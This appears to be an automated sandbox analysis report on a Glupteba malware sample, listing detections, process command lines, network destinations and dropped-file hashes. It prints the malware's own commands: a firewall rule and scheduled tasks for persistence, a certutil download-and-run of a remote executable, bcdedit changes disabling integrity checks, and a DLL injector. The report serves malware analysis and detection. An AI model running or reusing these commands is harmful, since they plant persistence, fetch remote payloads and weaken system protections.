Analysis Overview
SHA256
7bec73f4ea2b19439f13212e476245d88a0cf3da3a90cb27d684614e0a5affef
Threat Level: Known bad
The file 6fd9d52463f7b9444ae84fccccc96a3b was found to be: Known bad.
Malicious Activity Summary
Glupteba payload
MetaSploit
Glupteba
Modifies boot configuration data using bcdedit
Modifies Windows Firewall
Possible attempt to disable PatchGuard
Unsigned PE
Program crash
GoLang User-Agent
Creates scheduled task(s)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-01-22 17:10
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-01-22 17:10
Reported
2024-01-22 17:13
Platform
win7-20231215-en
Max time kernel
0s
Max time network
127s
Command Line
Signatures
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
MetaSploit
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
"C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe"
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240122171030.log C:\Windows\Logs\CBS\CbsPersist_20240122171030.cab
C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
"C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ninhaine.com | udp |
| US | 8.8.8.8:53 | 2makestorage.com | udp |
| US | 8.8.8.8:53 | nisdably.com | udp |
| US | 8.8.8.8:53 | 588d1572-2c5b-44f0-a191-4c6a741bfc76.ninhaine.com | udp |
| US | 8.8.8.8:53 | server12.ninhaine.com | udp |
| CZ | 46.8.8.100:443 | server12.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server12.ninhaine.com | tcp |
| US | 8.8.8.8:53 | msdl.microsoft.com | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 204.79.197.219:443 | msdl.microsoft.com | tcp |
| GB | 96.17.179.205:80 | apps.identrust.com | tcp |
| GB | 96.17.179.184:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard30.blob.core.windows.net | udp |
| US | 20.150.70.36:443 | vsblobprodscussu5shard30.blob.core.windows.net | tcp |
| US | 8.8.8.8:53 | ww82.ninhaine.com | udp |
| US | 199.59.243.225:80 | ww82.ninhaine.com | tcp |
| US | 199.59.243.225:80 | ww82.ninhaine.com | tcp |
| US | 20.150.79.68:443 | vsblobprodscussu5shard30.blob.core.windows.net | tcp |
| CZ | 46.8.8.100:443 | server12.ninhaine.com | tcp |
| US | 8.8.8.8:53 | spolaect.info | udp |
| CZ | 46.8.8.100:443 | server12.ninhaine.com | tcp |
| US | 199.59.243.225:80 | ww82.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server12.ninhaine.com | tcp |
| US | 199.59.243.225:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | server12.2makestorage.com | udp |
Files
memory/1668-0-0x00000000049F0000-0x0000000004E2C000-memory.dmp
memory/1668-1-0x00000000049F0000-0x0000000004E2C000-memory.dmp
memory/1668-2-0x0000000000400000-0x00000000030EF000-memory.dmp
memory/1668-3-0x0000000004E30000-0x0000000005756000-memory.dmp
memory/2624-5-0x0000000004970000-0x0000000004DAC000-memory.dmp
memory/1668-4-0x0000000000400000-0x00000000030EF000-memory.dmp
memory/1668-6-0x00000000049F0000-0x0000000004E2C000-memory.dmp
memory/2624-7-0x0000000004970000-0x0000000004DAC000-memory.dmp
memory/2624-8-0x0000000004DB0000-0x00000000056D6000-memory.dmp
memory/2624-9-0x0000000000400000-0x00000000030EF000-memory.dmp
\Windows\rss\csrss.exe
| MD5 | e0a64fe867395c4cee64c8c7feafd622 |
| SHA1 | bc4782ed2ffbeb6914965c5ee812002fdae05df9 |
| SHA256 | 29e8d37ff092ff8453cf0b4ffd1d6534d3b3108ac4ddc4b4f81bd717489d98d7 |
| SHA512 | d03e328bbcb7913e2c137d33237bd8c375893f98bb92f8d9690d2540b7b56828a4c3b08632f027df8ffeab276f38239acd692e821830b1df5a13500218560836 |
C:\Windows\rss\csrss.exe
| MD5 | 5fc8eddd8c87b4be855b21f7015109c5 |
| SHA1 | 1b2b802c289f770d16b4678d648630ee48f1384a |
| SHA256 | 530f26a68f4d28df80848c88bf421171a3b42f883e2f7adee89a2682b74d3ae1 |
| SHA512 | 4431adb2d4fabdf349d94c82cb331cfe74a4498d6aec5955057a989c4f0320970da151d31422e7bd11d0c834ce46aaccdf3c0291005915d26392557475470cec |
\Windows\rss\csrss.exe
| MD5 | 533126d85b3161ba22398edc770f92fa |
| SHA1 | fc3c9c15bea72157b33bf10936dddd8c8195605a |
| SHA256 | 903bc1efcd6b200fc06d1f58630cb06a1564af04b75ebf7072a40a1c4fb48f44 |
| SHA512 | c094910ab8ecc773e88fe6cc888a0b48865768146212e4f42cc55182ad2ce1c594e8080609732ee7ca0ce117a88625d484589ba4e6dd79f7f74afa18867c504f |
C:\Windows\rss\csrss.exe
| MD5 | b00ed00494ee57e6c52e15350a87642d |
| SHA1 | 670ea4ca841bb15c49c75a13f87dcab906a3523d |
| SHA256 | b74e8efc5f5083292415fe25813ea0e32206b24f25003646ddbabb25a9c12114 |
| SHA512 | a8c9c8dd39bbf5c27d1f5f4895e3084c6a619a6243d09af56e12ffdc997b5c2783c670b88512f21c9bc61f01428473d4b15ac57870f6d3f88f431ac487c191b6 |
memory/3000-19-0x0000000004990000-0x0000000004DCC000-memory.dmp
memory/2624-18-0x0000000000400000-0x00000000030EF000-memory.dmp
memory/2624-20-0x0000000004970000-0x0000000004DAC000-memory.dmp
memory/3000-21-0x0000000004990000-0x0000000004DCC000-memory.dmp
memory/3000-22-0x0000000000400000-0x00000000030EF000-memory.dmp
C:\Windows\rss\csrss.exe
| MD5 | 8c3add78367cbbcfc0e469398610b0ab |
| SHA1 | ee8b434d96bb2af3846fd18b46676113a942da92 |
| SHA256 | 47656a063da9c5c670f02ae9e2ea77710e68408e041d3d1f58e7fb0f6491ec4e |
| SHA512 | 5d30d97d3a3213c0d1f83d5afe2b25e9a22cfd3653e6647eafc8749be13302dfb9ae00fb295bb272fd687ff8690de1676d673b1d51b201556058da7651b17334 |
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
| MD5 | 2b3fb437d2aa195969805824a421e698 |
| SHA1 | 191321a74c1c114180a249f8fb0f0001a0f40909 |
| SHA256 | 2bc9e33c524cfd1d51589932721a0cec3fde6f09bb7939d4cd8cb17633b2eb9a |
| SHA512 | bb98943cf012f04132c4f05b2f39a7260ad9ac4bedd44032970098a7e30fc101f5c188c136ea6c3c4c0feda62d42055885d5dbcfb047c5cd64687d14bf1cd546 |
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
| MD5 | cb70c7f3923cb7fe161c13e3465b7a5d |
| SHA1 | f96d862b9d1a8f5779fcc9dba83b66988a8a5a55 |
| SHA256 | d157a3ad1f1e6a780830ca318f58e753c8dccc26d3f173f621b1bbd61c658ea6 |
| SHA512 | 9fc5e05123db47c51571a93abafb84a80119a7d512416b94ed2190bc717617f89a54fc614db85f01b714686670969e800dc9cd8d0fff594130cf42a247ff7bdb |
\Users\Admin\AppData\Local\Temp\symsrv.dll
| MD5 | 55b3d29babe9a022063ce6037c67c02d |
| SHA1 | 9ef776ea47a1adccde9ad035f2d9b2689541236c |
| SHA256 | d040c60cdb6702030b1168a1d3f50d3c19922b24625cf08aee60a23a83b3c267 |
| SHA512 | 2b248881511c926a4366beb8e543f6a34408ea83611799ffd46ff42f23d53a609f3d8e43d528a473a9306e6363d5f98f7166004827c634c48d2a08b24096a7ae |
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 76353b3230a8d5f0edb8236f39be76ac |
| SHA1 | 0366d61ae5400da73ee94e382c92ff4f0f6c0336 |
| SHA256 | 8fee315c8e4a0116d4d17a6eda2481a6c7e4384a7f2e38dab8218d38d2390e84 |
| SHA512 | 186a4a1948fd788b058631b57a548b769d5fb2bbfda0ac965b8fd9e0e788137d81ceed1dabb383f871c640c48a842e23b1c5c4e0b95e8be92e91826980276539 |
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 924095796173147e9bcab57734f24b20 |
| SHA1 | 0acedbff078dc3e7745dfa6088893364547f7721 |
| SHA256 | 9de62ba25d6d333413ef942de6b23681d477e516f0d5bfecda89ef867bbe1e25 |
| SHA512 | c9cd8734df658ea571628c47262dba4a56a7ec8c15eeed5c26d9144a4b78a98e5ca67e49d3083f90e6c9672621e22017aa9746672ba3b574a5080d701a1d247b |
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 9e283d09b2dfb3bbdad30ec5fda4d7fb |
| SHA1 | fe357fab7abd3e938025bfe660ce704c34778251 |
| SHA256 | 8f85a21bc4144c28f03499568f81ba153be9fdce158251d6d21bd4a6c37b2f8f |
| SHA512 | 54f149b392eaa4990f3b5809835583d60fc988da41c0c37941a442d1438dde4c8ce4e5ab99d7fca785a081c499d0090c7b3ff4d6e89712a9fb0b045e908062ae |
\Users\Admin\AppData\Local\Temp\dbghelp.dll
| MD5 | ec95ca03114bfe923aac5eee16bf6a3f |
| SHA1 | 83e872e217104770876cba544b6a2c9a3c8f8455 |
| SHA256 | 03173ddc1f16447a6f52e9a6858e952cec07bdcee4b922be071a837939af173e |
| SHA512 | 78ccc66935bd7451e2136cb960390ad961c8f08e125410b555bcf20357c71f466f94100803103d6d950062e27ef429569f1c588778d61120f532fe793246031c |
C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 03e03703fe5fc79e7f1d5e44e3c27b1e |
| SHA1 | 8f25ba10b5e479ae63c4c3867475502e1a6499fa |
| SHA256 | 504111bf8fb1386663a5f92bab46dc7b1171fb9c9a8b8cd100945a6c6bde311e |
| SHA512 | 1926c83c1f301800c289b16458ae30bc0927b231a5b11b12663d8a608c5ded27d8d73987ec6af46011e2f2b4e7e4c65fa7cfd50e5370d00e47784982874b88fa |
memory/1868-43-0x0000000140000000-0x00000001405E8000-memory.dmp
memory/1868-29-0x0000000140000000-0x00000001405E8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Tar2119.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 44e942e56ad71912f4cdbdff8dbb983e |
| SHA1 | 2e3c9c018527b8e5f98e333d91bc26386c0dfc0e |
| SHA256 | ccf4e6a578d687272a02dc32fba92e3c65e2b481974b9b8a3a0c3c03be8a0e14 |
| SHA512 | ea428a0dd1263ff64e9d6422ea632833cf67e064827a9438e217c4b1b2226789447a98bd6bf591ee929426a937bdfeb4c70eadbebf348afa265a39df9f89628f |
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | 3c1815ec1c06f8acd9081d59420400a1 |
| SHA1 | f439cb394e9d3abc15d2ae48fc07eac858603a24 |
| SHA256 | acad7cb2cabbb86e6fa636522c9b8c979e30b0d8238f246412bf2a734cac5ea5 |
| SHA512 | d99669c8d2fa2a37cd50768db21b07cd1b4659dabf94e3956fb44c74d885f49139654bbdaba571c7f3154f79536b90607ba597c073652ec361aa9802ed7a3789 |
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d562af68231088c295a5b09de3cbcb39 |
| SHA1 | 5944cd71d6f21bae4a9319d1aa404689f37eccc9 |
| SHA256 | 2cee86596ef577012a627e8dcade8ce31fb7629a26860e7b4a515d5448cfec2c |
| SHA512 | 8ac91cab45784733013c4689377d620a575c2f0862b78bf3cafe65d8f91ebab16483335ba7c620142055e812d62549b845c16038a14f9b35487f2dd76dd7649a |
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0d1d181084a526819f4dc38f2c911737 |
| SHA1 | ccde1f0aab4c945b6877819a48a047b11b33f4e0 |
| SHA256 | ad66c0d0561f38e3022fdc7c6f6bf4192b2c21f95b9451dcb309523255a0de0c |
| SHA512 | 0d301c376d076ed7f69b4fc5e3c6841f4626ff347a811d69a657b22a042b45b65fdad17ec2ead2a774e8004f26ebcd24e822aed78614c2a37517a758433837cc |
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
| MD5 | d4ae187b4574036c2d76b6df8a8c1a30 |
| SHA1 | b06f409fa14bab33cbaf4a37811b8740b624d9e5 |
| SHA256 | a2ce3a0fa7d2a833d1801e01ec48e35b70d84f3467cc9f8fab370386e13879c7 |
| SHA512 | 1f44a360e8bb8ada22bc5bfe001f1babb4e72005a46bc2a94c33c4bd149ff256cce6f35d65ca4f7fc2a5b9e15494155449830d2809c8cf218d0b9196ec646b0c |
memory/3000-258-0x0000000000400000-0x00000000030EF000-memory.dmp
memory/3000-259-0x0000000004990000-0x0000000004DCC000-memory.dmp
memory/3000-260-0x0000000000400000-0x00000000030EF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
| MD5 | c9b01a86e63bca4272d6629df216a696 |
| SHA1 | 0c1a515ca60ca432e7163ec59e9cbb93d12cf84e |
| SHA256 | 12e7e556c8c534b4b9e3a772ec266e48b15f92461fb68d8c75a7bc062b21519d |
| SHA512 | 7872033f755cb77fd7d46a02b6424ce3deebc9163b4841dafbb0dc42ee5f4246ca574109bcd9c458bddeaab924b2dfc6d447ca3ea102eb86d040a76041188295 |
memory/3000-263-0x0000000000400000-0x00000000030EF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | 435bdbda10a0eaeac0e7d33781be1837 |
| SHA1 | cdc07e5c82990eecb1f1de5f8d97ffe9cb908cdb |
| SHA256 | 9f0a2d4f0150f4c40d9a074e0bcd06d1db3e2bc5b5515e7783904d4b042450e4 |
| SHA512 | 416990e39a3726596bd7dd3bb70cbc9b08c47bd48d2e621c70616cc09a1fc556b9d41eb325dcc54cee1a1fb8d2affcf1aa2032f50db3bbb6db6a7634d487de8c |
\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | 02e5f16910a4349358aed053b51a3bf1 |
| SHA1 | 48caa92048187c8c45820c73d51d45cc21d2cf66 |
| SHA256 | 51aa341ecd7d28e009494df17df0af56f66791ad9385b643a1680de2af6254b8 |
| SHA512 | c3e9b1d809492a65ad4fda034bc66fd189adc1ff114c953ddcb7f6b13286dc11a76ed83771d174ac847066c21480deffd9774e073e3e2c5de6fd5080732c546e |
\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | ba28e2a2f186d232d0cb8784041b65ae |
| SHA1 | fdb5c6bd907e4990970c7fc6cd2d7a1d84e52e08 |
| SHA256 | 4bde582e142fd8de63c022b2d8962998308fd6a5e459d0fedfc251464f4667df |
| SHA512 | 5c353cf7f00213c0c5a0d25fecaf56b76c1d61b39e0bc18275de216193c249e222fae6ac0e39ed1d9b47f4a33095ee9a57a7fc1a0d4acb9ea9246694f254f089 |
\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | d97ea8f8b9f71bbbe784f5b118178a45 |
| SHA1 | 823784b6701dcfdb65a933c181759993d8a114c1 |
| SHA256 | 3bd5cbd6f7af5f903656bfd4b6c3a1a11d111480bf1ae58373df7b85705602d5 |
| SHA512 | 9a9f67ca22bd9fa1b6ee60f0bf1d033aaeb71d3c85e2ead77e79d71e011a22ea26555177e69e1ba36a1cdf9e3eb9836d69590603c6947f716e46b87910f5d5ec |
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
| MD5 | 32fd525da503cb69f7f1629ee58d2e32 |
| SHA1 | fa3a87ed98b0e048a63fa59652c2d71f7f82187f |
| SHA256 | 239be51515c362328aefa4bef8dc4b0f16ada5d10bc41ced0a64093173d60be5 |
| SHA512 | 5864560a9a9adec4b48eaa28edfbb2efd00eaa704fe5cc5c4b2431e718bf88f1e7d331756cc09e125bd07a4b4f3b32abbf847082c2867373369c72a9bbce51ff |
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
| MD5 | d98e78fd57db58a11f880b45bb659767 |
| SHA1 | ab70c0d3bd9103c07632eeecee9f51d198ed0e76 |
| SHA256 | 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0 |
| SHA512 | aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831 |
memory/3000-314-0x0000000000400000-0x00000000030EF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | 15294aac39d43bdadb3cbe422a656a77 |
| SHA1 | debb2fb31abff11aaf7ad03010c133628a345e70 |
| SHA256 | ec9a6e9b9f4933bebacb3eb8824f94f04024e09ac3e408614d48f301fef6cf8f |
| SHA512 | dd2f31fa0039609068bc2b1086fc82944969d02f14d16d231a0aa06b9dae4dabc0414610541976c6e47d7d552664a024f51e096a08b04e708898d72743dfbde3 |
\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | 034bccff31f9b5930b1a405d88bbc79e |
| SHA1 | e9aaba0aa4e00562a2a68316109001274b844003 |
| SHA256 | fc26c36ff97f9a5d0d8a925c72cb963123d3013a69eab9086b40afeffa1fb622 |
| SHA512 | 6994168753129e4a1a5d52d762fc2a5c1b041d013b9620f63f76198dc9bc927056c5b8d25ecdbb680e4a82cf9d6ed83de264223d365f898d57ae139a1c3208ab |
memory/3000-344-0x0000000000400000-0x00000000030EF000-memory.dmp
memory/3000-345-0x0000000000400000-0x00000000030EF000-memory.dmp
memory/3000-346-0x0000000000400000-0x00000000030EF000-memory.dmp
memory/3000-371-0x0000000000400000-0x00000000030EF000-memory.dmp
memory/3000-372-0x0000000000400000-0x00000000030EF000-memory.dmp
memory/3000-373-0x0000000000400000-0x00000000030EF000-memory.dmp
memory/3000-374-0x0000000000400000-0x00000000030EF000-memory.dmp
memory/3000-375-0x0000000000400000-0x00000000030EF000-memory.dmp
memory/3000-376-0x0000000000400000-0x00000000030EF000-memory.dmp
memory/3000-377-0x0000000000400000-0x00000000030EF000-memory.dmp
memory/3000-378-0x0000000000400000-0x00000000030EF000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-01-22 17:10
Reported
2024-01-22 17:13
Platform
win10v2004-20231215-en
Max time kernel
3s
Max time network
150s
Command Line
Signatures
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
MetaSploit
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Program crash
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
"C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1116 -ip 1116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 368
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1116 -ip 1116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 372
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 200 -p 1116 -ip 1116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 372
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1116 -ip 1116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1116 -ip 1116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1116 -ip 1116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 724
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1116 -ip 1116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1116 -ip 1116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 752
C:\Windows\SysWOW64\WerFault.exe
